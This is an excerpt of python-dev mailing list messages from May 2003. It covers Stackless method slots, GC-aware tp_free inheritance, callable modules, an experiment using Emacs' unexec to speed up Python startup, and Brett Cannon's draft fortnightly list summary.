From guido@python.org  Sun May 18 22:04:40 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 18 May 2003 17:04:40 -0400
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: "Your message of Sat, 17 May 2003 01:52:20 +0200."
 <3EC579B4.9000303@tismer.com>
References: <3EC579B4.9000303@tismer.com>
Message-ID: <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>

> In the last months, I have made a great deal of progress with Stackless 3.0.
> Finally, I was able to make much more of Python stackless
> (which means, it does not use recursive interpreter calls) than
> I could achieve with 1.0.
> 
> There is one drawback with this, and I need advice:
> Compared to older Python versions, Py 2.2.2 and up uses
> more indirection through C function pointers than ever.
> This blocked my implementation of stackless versions, in
> the first place.
> 
> Then the idea hit me like a blizzard:
> Most problems simply vanish if I add another slot to the
> PyMethodDef structure, which is NULL by default:
> ml_meth_nr is a function pointer with the same semantics
> as ml_meth, but it tries to perform its action without
> doing a recursive call. It tries instead to push a frame
> and to return Py_UnwindToken.
> Doing this change made Stackless crystal clear and simple:
> A C extension not aware of Stackless does what it does
> all the time: call ml_meth.
> Stackless aware C code (like my modified ceval.c code)
> calls the ml_meth_nr slots, instead, which either defaults
> to the ml_meth code, or has a special version which avoids
> recursive interpreter calls.
> I also added a tp_call_nr slot to typeobject, for similar
> reasons.
> 
> While this is just great for me, yielding complete
> source code compatibility, it is a slight drawback, since
> almost all extension modules make use of the PyMethodDef
> structure. Therefore, binary compatibility of Stackless
> has degraded dramatically.
> 
> I'm now in some kind of dilemma:
> On the one side, I'm happy with this solution (while I have
> to admit that it is not too inexpensive, but well, all the
> new descriptor objects are also not cheap, but just great),
> on the other hand, simply replacing python22.dll is no longer
> sufficient. You need to re-compile everything, which might
> be a hard thing on Windows (win32 extensions, wxPython).
> Sure, I would stand this, if there is no alternative, I would
> have to supply a complete replacement package of everything.
> 
> Do you (does anybody) have an alternative suggestion for how
> to efficiently maintain a "normal" and a "non-recursive"
> version of a method without changing the PyMethodDef struct?
> 
> Alternatively, would it be reasonable to ask the Python core
> developers, if they would accept to augment PyMethodDef and
> PyTypeObject with an extra field (default NULL, no maintenance),
> just for me and Stackless?
> 
> Many thanks for any reply - sincerely -- chris

I don't think we can just add an extra field to PyMethodDef, because
it would break binary compatibility.  Currently, in most cases, a
3rd party extension module compiled for an earlier Python version can
still be used with a later version.  Because PyMethodDef is used as an
array, adding a field to it would break this.

I have less of a problem with extending PyTypeObject, it grows all the
time and the tp_flags bits tell you how large the one you've got is.
(I still have some problems with this, because things that are of no
use to the regular Python core developers tend to either confuse them,
or be broken on a regular basis.)

Maybe you could get away with defining an alternative structure for
PyMethodDef and having a flag in tp_flags say which it is; there are
plenty of unused bits and I don't mind reserving one for you.  Then
you'd have to change all the code that *uses* tp_methods, but there
isn't much of that; in fact, the only place I see is in typeobject.c.
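
Roughly -- the flag name, bit value, and struct name below are made up,
and the real bit would have to be reserved in object.h:

#include "Python.h"

#define Py_TPFLAGS_HAVE_NR_METHODS (1L << 20)   /* hypothetical bit */

/* Layout used only in the tp_methods arrays of Stackless-built
   extensions; ordinary extensions keep using PyMethodDef unchanged. */
typedef struct {
    PyMethodDef base;           /* the ordinary four fields */
    PyCFunction ml_meth_nr;     /* non-recursive variant, may be NULL */
} PyMethodDefNR;

/* Code that walks tp_methods checks the flag before trusting the
   bigger layout: */
static PyCFunction
method_impl(PyTypeObject *tp, PyMethodDef *md)
{
    if (PyType_HasFeature(tp, Py_TPFLAGS_HAVE_NR_METHODS)) {
        PyCFunction nr = ((PyMethodDefNR *)md)->ml_meth_nr;
        if (nr != NULL)
            return nr;
    }
    return md->ml_meth;
}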

If this doesn't work for you, maybe you could somehow fold the two
implementation functions into one, and put something special in the
argument list to signal that the non-recursive version is wanted?
(Thinking aloud here -- I don't know exactly what the usage pattern of
the nr versions will be.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim@zope.com  Sun May 18 22:42:28 2003
From: tim@zope.com (Tim Peters)
Date: Sun, 18 May 2003 17:42:28 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <200305182039.h4IKdU717764@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBAEGAB.tim@zope.com>

[Guido]
> Yes, I think this is the right thing to do -- either only inherit
> tp_free when the GC bit of the base and derived class are the same,

Jim is keen to have gc'able classes defined in C get the right deallocation
function by magic.  In these cases, he leaves tp_free NULL, but indicates
gc-ability in tp_flags.  tp_base becomes "object" by magic then, and the GC
bits are not the same, and neither inheriting object.tp_free nor leaving
derived_class.tp_free NULL can work.  It seems like a reasonable thing to me
to want it to work, so on to the next:

> or -- in addition -- special case inheriting PyObject_Del and turn it
> into PyObject_GC_Del when the base class adds the GC bit.

That's what I had in mind, s/base/derived/, plus raising an exception if a
gc'able class explicitly sets tp_free to PyObject_Del (probably a
cut-'n-paste error when that happens, or that gc-ability was tacked on to a
previously untracked type).

If that's all OK, enjoy your vacation, and I'll take care of this (for 2.3
and 2.2.3).
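
In rough sketch form (not the actual patch), the inheritance rule, as it
might sit inside PyType_Ready()'s slot inheritance, would be something
like:

static void
inherit_free(PyTypeObject *type, PyTypeObject *base)
{
    int base_gc = PyType_HasFeature(base, Py_TPFLAGS_HAVE_GC);
    int type_gc = PyType_HasFeature(type, Py_TPFLAGS_HAVE_GC);

    if (type->tp_free != NULL)
        return;                           /* the type author supplied one */

    if (type_gc == base_gc)
        type->tp_free = base->tp_free;    /* plain inheritance is safe */
    else if (type_gc && base->tp_free == PyObject_Del)
        type->tp_free = PyObject_GC_Del;  /* derived class added the GC bit */
    /* else leave it NULL and let the type author sort it out */
}

plus a check that complains if a gc'able type explicitly puts
PyObject_Del in tp_free.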




From troy@gci.net  Sun May 18 23:07:37 2003
From: troy@gci.net (Troy Melhase)
Date: Sun, 18 May 2003 14:07:37 -0800
Subject: [Python-Dev] a strange case
In-Reply-To: <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net>
References: <20030516202402.30333.72761.Mailman@mail.python.org>
 <200305161345.25415.troy@gci.net>
 <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200305181407.37880.troy@gci.net>

> Please don't try to blur the line between module and class.  This has
> been proposed many times, and the net result IMO is always more
> confusion and no more power.  This is also why in 2.3, modules are no
> longer subclassable.

Loud and clear!

> (I would explain more about *why* I think it's a really bad idea, but
> I'm officially on vacation.)

"There should be one-- and preferably only one --obvious way to do it" if I 
had to guess.  Happy holidays.

-troy


From walter@livinglogic.de  Sun May 18 23:19:18 2003
From: walter@livinglogic.de (Walter Dörwald)
Date: Mon, 19 May 2003 00:19:18 +0200
Subject: [Python-Dev] a strange case
In-Reply-To: <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net>
References: <20030516202402.30333.72761.Mailman@mail.python.org> <200305161345.25415.troy@gci.net> <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EC806E6.3040204@livinglogic.de>

Guido van Rossum wrote:

>>"Why in the world would you want callable modules you ask?"  I=20
>>don't have a real need, but I often see the line blurred between packag=
e,=20
>>module, and class.
>=20
> Please don't try to blur the line between module and class.  This has
> been proposed many times,

It sounds familiar! ;)

> and the net result IMO is always more
> confusion and no more power.  This is also why in 2.3, modules are no
> longer subclassable.
>
> If you really need to have a module that has behavior beyond what a
> module can offer, the officially sanctioned way is to stick an
> instance of a class in sys.modules[__name__] from inside the module's
> code.
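
A minimal sketch of that trick (the module and class names are made up):

    # spammodule.py
    import sys

    class _SpamModule(object):
        """Stands in for the module object; add whatever behavior is wanted."""
        def __call__(self, *args):
            print "called as a module:", args

    # "import spammodule" then binds the name to this instance,
    # so spammodule(1, 2) calls it.
    sys.modules[__name__] = _SpamModule()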

But reload() won't work for these pseudo modules (See
http://www.python.org/sf/701743). What about the imp module?

> (I would explain more about *why* I think it's a really bad idea, but
> I'm officially on vacation.)

Sure, this can wait.

Bye,
    Walter Dörwald




From jepler@unpythonic.net  Mon May 19 02:22:14 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sun, 18 May 2003 20:22:14 -0500
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <1053112171.2342.7.camel@barry>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]> <1052927757.7258.38.camel@slothrop.zope.com> <3EC51B5C.2080307@lemburg.com> <16069.13640.892428.185711@montanaro.dyndns.org> <1053112171.2342.7.camel@barry>
Message-ID: <20030519012212.GA10317@unpythonic.net>

On Fri, May 16, 2003 at 03:09:31PM -0400, Barry Warsaw wrote:
> Skip, you're going about this all wrong.  We already have the technology
> to start Python up blazingly fast.  All you have to do <wink> is port
> XEmacs's unexec code.  Then you load up Python with all the modules you
> think you're going to need, unexec it, then the next time it starts up
> like lightning.  Disk space is cheap!

I gave it a try, starting with 2.3b1 and using FSF Emacs 21.3's unexelf.c.
An unexec'd binary loads faster than 'python -S -c pass', and seems to
work properly with two exceptions and a few limitations.

The only change to Python is in main(): I use mallopt() to force all
allocations to go through brk() instead of through mmap(), because unexec
doesn't support mmap'd memory.  I also used Modules/Setup.local to make
some normally-shared modules not shared (for the same reason).

dump.py loads the requested modules (-<module> forces the module to *not*
be found) and then calls unexec(), producing a new binary with the given
name.

$ time ./python -S -c pass         # best 'real' of 5 runs
real    0m0.054s
user    0m0.040s
sys     0m0.010s
$ time ./python -c 'import cgi'    # best 'real' of 5 runs
real    0m0.127s
user    0m0.110s
sys     0m0.010s
$ strace -e open ./python -c 'import cgi' 2>&1 | grep -v ENOENT | wc -l
     88
$ ./python dump.py cgipython -_ssl cgi
$ time ./cgipython -c 'import cgi' # best 'real' of 5 runs
real    0m0.039s
user    0m0.020s
sys     0m0.020s
$ strace -e open ./cgipython -c 'import cgi' 2>&1 | grep -v ENOENT | wc -l
      9
$ ./python dump.py dython
-rwxrwxr-x    1 jepler   jepler    4983713 May 18 19:42 cgipython
-rwxrwxr-x    1 jepler   jepler    3603737 May 18 19:39 python
-rwxrwxr-x    1 jepler   jepler    4541345 May 18 19:55 dython

(a minimal unexec'd python is about 90k bigger than the regular Python
binary)

I'm running the test suite now .. it hangs in test_signal for some reason.  
test_thread seems to hang too, which may be related.  (but test_threading
completes?)

$ ./dython Lib/test/regrtest.py -x test_signal -x test_thread
[...]
225 tests OK.
26 tests skipped:
    test_aepack test_al test_bsddb3 test_bz2 test_cd test_cl
    test_curses test_email_codecs test_gl test_imgfile
    test_linuxaudiodev test_macfs test_macostools test_nis
    test_normalization test_ossaudiodev test_pep277 test_plistlib
    test_scriptpackages test_socket_ssl test_socketserver
    test_sunaudiodev test_timeout test_urllibnet test_winreg
    test_winsound
1 skip unexpected on linux2:
    test_bz2

Well, if it worked right it'd sure be interesting.  OTOH, unexelf.c is
GPL'd and there's also the nightmare of different unex* for different
platforms.  

Jeff

########################################################################
# dump.py
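# Usage: ./python dump.py <new-binary-name> [-]module ...
# A leading "-" forces that module to *not* be found (so it is left out of the dump).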
import unexec, sys

for m in sys.argv[2:]:
	if m[0] == "-":
		sys.modules[m[1:]] = None
		continue
	__import__(m)
	
for m in sys.modules.keys():
	mod = sys.modules[m]
	if mod is None:
		continue # negatively cached entry
	if not hasattr(mod, "__file__"):
		continue # builtin module
	if mod.__file__.endswith(".so"):
		raise RuntimeError, "Cannot dump with shared module %s" % m

unexec.dump(sys.argv[1], sys.executable)


/**********************************************************************/
/* unexecmodule.c (needs unexec() eg from unexelf.c)                  */
#include <Python.h>

extern void unexec (char *new_name, char *old_name, unsigned data_start, unsigned bss_start, unsigned entry_address);

static PyObject *dump_python(PyObject *self, PyObject *args) {
	char *filename, *symfile;
	if(!PyArg_ParseTuple(args, "ss", &filename, &symfile))
		return NULL;
	unexec(filename, symfile, 0, 0, (unsigned)Py_Main);
	_exit(99);
}

static PyMethodDef dump_methods[] = {
	{"dump", dump_python, METH_VARARGS,
		PyDoc_STR("dump(filename, symfile) -> None")},
	{NULL, NULL}
};

PyDoc_STRVAR(module_doc,
"Support for undumping the Python executable, a la Emacs");

PyMODINIT_FUNC
initunexec(void)
{
	Py_InitModule3("unexec", dump_methods, module_doc);
}

########################################################################
# Setup.local

# Edit this file for local setup changes
unexec unexecmodule.c unexelf.c
time timemodule.c
_socket socketmodule.c
_random _randommodule.c
math mathmodule.c
fcntl fcntlmodule.c


From drifty@alum.berkeley.edu  Mon May 19 02:38:24 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sun, 18 May 2003 18:38:24 -0700
Subject: [Python-Dev] python-dev Summary for 2003-05-01 through 2003-05-15
Message-ID: <3EC83590.1000306@ocf.berkeley.edu>

It's that time of the month again.

The only thing I would like help with for this summary is if someone knows 
the attribute lookup order (instance, class, class descriptor, ...) off 
the top of their heads, can you let me know?  If not I can find it out 
by going through the docs but I figure someone out there has to know it 
by heart and any possible quirks (like whether descriptors take 
precedence over non-descriptor attributes).

I won't send this off until Wednesday.

----------------------

+++++++++++++++++++++++++++++++++++++++++++++++++++++
python-dev Summary for 2003-05-01 through 2003-05-15
+++++++++++++++++++++++++++++++++++++++++++++++++++++
This is a summary of traffic on the `python-dev mailing list`_ from May 
1, 2003 through May 15, 2003.  It is intended to inform the wider Python 
community of on-going developments on the list and to have an archived 
summary of each thread started on the list.  To comment on anything 
mentioned here, just post to python-list@python.org or 
`comp.lang.python`_ with a subject line mentioning what you are 
discussing. All python-dev members are interested in seeing ideas 
discussed by the community, so don't hesitate to take a stance on 
something.  And if all of this really interests you then get involved 
and join `python-dev`_!

This is the seventeenth summary written by Brett Cannon (going to grad 
school, baby!).

All summaries are archived at http://www.python.org/dev/summary/ .

Please note that this summary is written using reStructuredText_ which 
can be found at http://docutils.sf.net/rst.html .  Any unfamiliar 
punctuation is probably markup for reST_ (otherwise it is probably 
regular expression syntax or a typo =); you can safely ignore it, 
although I suggest learning reST; it's simple and is accepted for `PEP 
markup`__.  Also, because of the wonders of programs that like to 
reformat text, I cannot guarantee you will be able to run the text 
version of this summary through Docutils_ as-is unless it is from the 
original text file.

__ http://www.python.org/peps/pep-0012.html

The in-development version of the documentation for Python can be found 
at http://www.python.org/dev/doc/devel/ .  To view files in the Python 
CVS online, go to http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/ .

.. _python-dev: http://www.python.org/dev/
.. _python-dev mailing list:
   http://mail.python.org/mailman/listinfo/python-dev
.. _comp.lang.python: http://groups.google.com/groups?q=comp.lang.python
.. _Docutils: http://docutils.sf.net/
.. _reST:
.. _reStructuredText: http://docutils.sf.net/rst.html

.. contents::


.. _last summary:
   http://www.python.org/dev/summary/2003-04-16_2003-04-30.html


======================
Summary Announcements
======================
So, to help keep my sanity longer than my predecessors I am no longer 
going to link to individual modules in the stdlib nor to files in CVS. 
It sucks down a ton of time and at least Raymond Hettinger thinks it 
clutters the summaries.

Along the lines of the look of the summaries, I am trying out a new 
layout for listing splinter threads.  If you have a preference between 
the old style and the new style, speak up and let me know.


==========================
`Dictionary sparseness`__
==========================
__ http://mail.python.org/pipermail/python-dev/2003-May/035295.html

Splinter threads:
     `Where'd my memory go?`__

__ http://mail.python.org/pipermail/python-dev/2003-May/035340.html

After all the work Raymond Hettinger did on dictionaries he suggested 
two possible methods on dictionaries that would allow the programmer to 
control how sparse (at what point a dictionary doubles its size in order 
to lower collisions) a dictionary should be.  Both got shot down on the 
grounds that most people would not know how to properly use the methods 
and are more likely to shoot themselves in the foot than get any gain 
out of them.

There was also a bunch of talk about the "old days" when computers were 
small and didn't measure the amount of RAM they had in megabytes unless 
they were supercomputers.

But then the discussion changed to memory footprints.  There was some 
mention of the extra output one can get from a special build (all listed 
in Misc/SpecialBuilds.txt) such as Py_DEBUG.  But the issue at hand is 
that there are int, float, and frameobject free lists which keep alive any 
and all created constant values (although the frameobject is bounded in 
size).  This is why if you do ``range(2000000)`` you won't get the 
memory allocated for all of those integers back until you shut down the 
interpreter.

This led to the suggestion of just doing away with the free lists. 
There would be a performance hit since numerical constants would have to 
be reallocated if they are constantly created, deleted, and then created 
again.  It was also suggested to limit the size of the free lists and 
basically chop off the tail if they grew too large.  But it turns out 
that the memory is allocated in large blocks that are chopped up by 
intobject.c.  Thus there is no way to just get rid of a few entries 
without taking out a whole block of objects.


=================================
`__slots__ and default values`__
=================================
__ http://mail.python.org/pipermail/python-dev/2003-May/035575.html

Ever initialized a variable in a class that uses __slots__?  If you have 
you may have discovered that the variable becomes read-only::

     class Parrot(object):
         __slots__ = ["dead"]
         dead = True

     bought_bird = Parrot()
     bought_bird.dead = False

That raises an AttributeError saying that 'dead' is read-only.  This 
occurs because the class attribute "overrides the descriptor created by 
__slots__" and "now appears read-only because there is no instance dict" 
thanks to __slots__ suppressing the creation of one.

But don't go using this trick!  If you want read-only attributes use a 
property with its set function set to raise an exception.  If you want 
to avoid this problem just do your initialization of attributes in the 
__init__ call.  You can also include __dict__ in __slots__ and then your 
instances will have a fully functioning instance __dict__ (new in 2.3).
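
A minimal sketch of the read-only-property approach and the 
__dict__-in-__slots__ approach (the class names are made up)::

     class Parrot(object):
         __slots__ = ["_dead"]

         def __init__(self):
             self._dead = True

         def _get_dead(self):
             return self._dead
         def _set_dead(self, value):
             raise AttributeError("dead is read-only")
         dead = property(_get_dead, _set_dead)

     class FlexibleParrot(object):
         # including __dict__ restores a normal instance dict (new in 2.3)
         __slots__ = ["__dict__"]
         dead = True

     bought_bird = FlexibleParrot()
     bought_bird.dead = False   # works; the instance dict shadows the class attribute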

The key thing to come away with from this is twofold.  One is the resolution 
order of attribute lookup which is XXX.  The other is that __slots__ is 
meant purely to cut down on memory usage, nothing more.  Do not start 
abusing it with little tricks like the one mentioned above or Guido will 
pull it from the language.


=========
Quickies
=========

`Draft of dictnotes.txt`__
     After all the work Raymond Hettinger did to try to speed up 
dictionaries, he wrote a text file documenting everything he tried and 
learned.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035246.html

`_socket efficiencies ideas`__
     This thread was first covered in the `last summary`_.
     Guido discovered that the socket module used to special-case 
receiving a numeric address in order to skip the overhead of trying to 
resolve the IP address.  The special case has been put back into the code.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035248.html

`Demos and Tools in binary distributions`__
     Jack Jansen asked where other platform-specific binary 
distributions of Python put the Demo and Tools directories.  The thread 
ended with the winning solution being to put them in 
/Applications/Python2.3/Extras/ so they are a level below the root 
directory, preventing newbies from getting overwhelmed by the code there 
since it is not all simple.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035252.html

`updated notes about building bsddb185 module`__
     Splinter threads:
       - `bsddb185 module changes checked in`__

     Someone wanted the bsddb185 module back.  Initially it was 
suggested to build that module as bsddb if the new bsddb3 module could 
not be built (since that module currently gets named bsddb).  The final 
outcome was that bsddb185 will get built under certain conditions and be 
named bsddb185.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035257.html
__ http://mail.python.org/pipermail/python-dev/2003-May/035409.html

`broke email date parsing`__
     ... but it got fixed.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035259.html

`New thread death in test_bsddb3`__
     This is a continuation from the `last summary`_.
     You can create as many thread states as you like as long as you 
only use one at any given point.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035230.html

`removing csv directory from nondist/sandbox - how?`__
     Joys of CVS.  You can never remove a directory unless you have 
direct access to the physical directory on the CVS server.  The 
best you can do is to empty the directory (make sure to get files named 
".*") and assume people will do a ``cvs update -dP``.  You can also 
remove the empty directories locally by hand if you like.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035270.html

`posixmodule.c patch to support forkpty`__
     A patch that tries to get os.forkpty to work on more platforms was 
incorrectly sent to python-dev.  It is now up on SourceForge_ as 
`patch #732401 <http://www.python.org/sf/732401>`__.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035281.html
.. _SourceForge: http://www.sf.net/projects/python

`Timbot?`__
     There is a real Timbot robot out there: 
http://www.cse.ogi.edu/~mpj/timbot/#Programming .

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035287.html

`optparse docs need proofreading`__
     What the 'subject' says.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035288.html

`heaps`__
     This is a continuation of a thread from the `last summary`_.
     Lots of discussion about heaps, priority queues, and other 
algorithmic theory.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035343.html

Weekly Python Bug/Patch Summary
     First one ended on `2003-05-04 
<http://mail.python.org/pipermail/python-dev/2003-May/035292.html>`__. 
The second one ended on `2003-05-11 
<http://mail.python.org/pipermail/python-dev/2003-May/035537.html>`__.

`Distutils using apply`__
     Since Distutils must be kept backwards-compatible (as stated in 
`PEP 291`_), it still uses 'apply'.  This raises a PendingDeprecationWarning, 
which is normally silent unless you ask for all warnings to be shown.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035293.html
.. _PEP 291: http://www.python.org/peps/pep-0291.html

`How to test this?`__
     Dummy files can be checked into Lib/test .

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035318.html

`Windows installer request...`__
     Someone wanted the default drive on the Windows installer to be 
your boot drive and not C.  It has been fixed.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035319.html

`Election of Todd Miller as head of numpy team`__
     What the 'subject' says.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035326.html

`Startup time`__
     Guido noticed that although Python 2.3 is already faster than 2.2, 
its startup time is slower.  It looks like it is from failing stat 
calls.  Speeding this all up is still being worked on.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035359.html

`testing with and without pyc files present`__
     Why does ``make test`` delete all .pyc and .pyo files before 
running the regression tests?  To act as a large scale test of the 
marshaling code.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035362.html

`pyconfig.h not regenerated by "config.status --recheck"`__
     ``./config.status --recheck`` doesn't work too well.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035366.html

`Python Technical Lead, New York, NY - 80-85k`__
     Wrong place for a job announcement.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035369.html

`RedHat 9 _random failure under -pg`__
     gcc ain't perfect.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035386.html

`SF CVS offline`__
     ... but it came back up.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035398.html

`Microsoft speedup`__
     It was noticed that turning on more aggressive inlining for VC6 
sped up pystone by 2.5% while upping the executable size by 13%.  Tim 
Peters noted that "A couple employers ago, we disabled all magical 
inlining options, because sometimes they made critical loops faster, and 
sometimes slower, and you couldn't guess which as the code changed".

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035454.html

`Relying on ReST in the core?`__
     Although docutils_ is not in the core yet, it is being used more 
and more.  But is this safe?  As long as it's kept conservative and not 
required anywhere, yes.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035465.html

`Make _strptime only time.strptime implementation?`__
     As long as no one complains too loudly by 2.3b2, _strptime.strptime 
will become the exclusive implementation of time.strptime. 
_strptime.strptime also learned how to recognize UTC and GMT as timezones.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035481.html

`Building Python with .NET 2003 SDK`__
     Logistix was nice enough to try to build Python on .NET 2003 and 
post notes on how he did it at 
http://www.cathoderaymission.net/~logistix/python/buildingPythonWithDotNet.html 
.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035485.html

`local import cost`__
     Trying to find out how the cost of doing imports in the local 
namespace compares to doing them at the global level.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035486.html
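
     One rough way to measure the difference with the new timeit module (a 
sketch, not code from the thread)::

         import timeit

         # import resolved once, at the global level
         print timeit.Timer("math.sqrt(2.0)", "import math").timeit()

         # import statement re-executed (hitting sys.modules) on every pass
         print timeit.Timer("import math; math.sqrt(2.0)").timeit()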

`Subclassing int?`__
     This thread started `two summaries ago 
<http://www.python.org/dev/summary/2003-04-01_2003-04-15.html>`__.
     Subclassing int to make it mutable just doesn't work.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035500.html

`patch 718286`__
     The patch was applied.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035538.html

`Need some patches checked`__
     Some patches needed to be cleared by more senior members of 
python-dev since they were being handled by the young newbie of the 
group.  Jeremy Hylton also mentioned that a full-scale refactoring of 
urllib2 is needed and would allow the closure of some patches.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035540.html

`os.path.walk() lacks 'depth first' option`__
     Splinter threads:
       - `os.walk() silently ignores errors`__

     This thread started in the `last summary`_.
     LookupError exists and subclasses both IndexError and KeyError. 
Rather handy when you don't care whether you are dealing with a list or 
dictionary but do care if what you are looking for doesn't exist.
     os.walk also gained a parameter argument called onerror that takes 
a function that will be passed any exception raised by os.walk as it 
does its thing; previously os.walk ignored all errors.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035546.html
__ http://mail.python.org/pipermail/python-dev/2003-May/035574.html
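
     A small sketch of the new onerror hook (the path and callback name are 
made up)::

         import os

         def note_error(err):
             # err is the exception raised by the failed directory listing
             print "skipping:", err

         for dirpath, dirnames, filenames in os.walk("/some/tree",
                                                      onerror=note_error):
             pass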

`Random SF tracker ettiquete questions`__
     Does python-dev care about dealing with RFEs?  Sort of; it isn't a 
priority like patches and bugs, but cleaning them out once in a while 
doesn't hurt.  Is it okay to assign a tracker item to yourself even if 
it is already assigned to another person?  If the original person it was 
assigned to is not actively working on it, then yes.  When should 
someone be put into the Misc/ACKS file?  When they have done anything 
that required some amount of brain power (yes, this includes one-line 
patches).

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035549.html

`codeop: small details (Q); commit priv request`__
     Some issues with codeop were worked out and Samuele Pedroni got 
commit privileges.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035556.html

`Python 2.3b1 _XOPEN_SOURCE value from configure.in`__
     Python.h should always be included in extension modules before 
any other header files.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035560.html

`Inplace multiply`__
     Someone thought they had found a bug.  Michael Hudson thought it 
was an old bug that was fixed.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035591.html

`sf.net/708007: expectlib.py telnetlib.py split`__
     A request for people to look at http://www.python.org/sf/708007 .

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035605.html

`Simple dicts`__
     Tim Peters suggested that if someone wanted something to do they 
could try re-implementing dicts to using chaining instead of open 
addressing.  It turns out Damien Morton (who did a ton of work trying to 
optimize Python's bytecode) is  working on an immplementation.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035625.html

`python/dist/src/Lib warnings.py,1.19,1.20`__
     As part of the attempts to speed up startup time, eliminating the 
required import of the re module came up.  This thread brought up the 
question of whether it is desirable to be able to pass a regexp as an 
argument to the -W command-line option for Python.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035616.html

`[PEP] += on return of function call result`__
     You can't assign to the return value of a method call.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035640.html

`Vacation; Python 2.2.3 release.`__
     Guido is going on vacation and won't be back until May 26.  He 
would like Python 2.2.3 to be out shortly after he gets back, although 
if it comes out while he is gone he definitely won't complain.  =)  You 
can get an anonymous CVS checkout of the 2.2 maintenance branch by 
executing ``cvs -d 
:pserver:anonymous@cvs.python.sourceforge.net:/cvsroot/python checkout 
-d <dir to store in> -r release22-maint python`` and replacing the <> 
placeholder with the directory you want to put your CVS copy into.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035642.html

`MS VC 7 offer`__
     At `Python UK`_ Guido was offered free copies of `Visual C++ 2003`_ 
by the project lead of VC, Nick Hodapp, for key developers (a free copy 
of the compiler is available at 
http://www.msdn.microsoft.com/netframework/downloads/howtoget.aspx ). 
This instantly led to the discussion of whether Python's binary 
distribution for Windows should be moved off of VC 6 to 7.  The biggest 
issue is that apparently passing FILE * values across library boundaries 
breaks code.  The final decision seemed to be that Tim, Guido, and 
developers of major extensions should get free copies.  Then an end date 
of when Python will be moved off of VC 6 and over to 7 will be decided. 
None of this will affect Python 2.3.

     This thread was 102 emails long.  I don't use Windows.  This was 
painful.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035375.html
.. _Python UK: http://www.python-uk.org/
.. _Visual C++ 2003: http://msdn.microsoft.com/visualc/



From dberlin@dberlin.org  Mon May 19 02:56:58 2003
From: dberlin@dberlin.org (Daniel Berlin)
Date: Sun, 18 May 2003 21:56:58 -0400
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030519012212.GA10317@unpythonic.net>
Message-ID: <2D129034-899D-11D7-BB2B-000A95A34564@dberlin.org>

On Sunday, May 18, 2003, at 09:22  PM, Jeff Epler wrote:

> On Fri, May 16, 2003 at 03:09:31PM -0400, Barry Warsaw wrote:
>> Skip, you're going about this all wrong.  We already have the 
>> technology
>> to start Python up blazingly fast.  All you have to do <wink> is port
>> XEmacs's unexec code.  Then you load up Python with all the modules 
>> you
>> think you're going to need, unexec it, then the next time it starts up
>> like lightning.  Disk space is cheap!
>
> I gave it a try, starting with 2.3b1 and using FSF Emacs 21.3's 
> unexelf.c.

XEmacs has a portable undumper, IIRC.

> An unexec'd binary loads faster than 'python -S -c pass', and seems to
> work properly with two exceptions and a few limitations.
>
> The only change to Python is in main(): I use mallopt() to force all
> allocations to go through brk() instead of through mmap(), because 
> unexec
> doesn't support mmap'd memory.  I also used Modules/Setup.local to make
> some normally-shared modules not shared (for the same reason).
>
> dump.py loads the requested modules (-<module> forces the module to 
> *not*
> be found) and then calls unexec(), producing a new binary with the 
> given
> name.
>
> $ time ./python -S -c pass         # best 'real' of 5 runs
> real    0m0.054s
> user    0m0.040s
> sys     0m0.010s
> $ time ./python -c 'import cgi'    # best 'real' of 5 runs
> real    0m0.127s
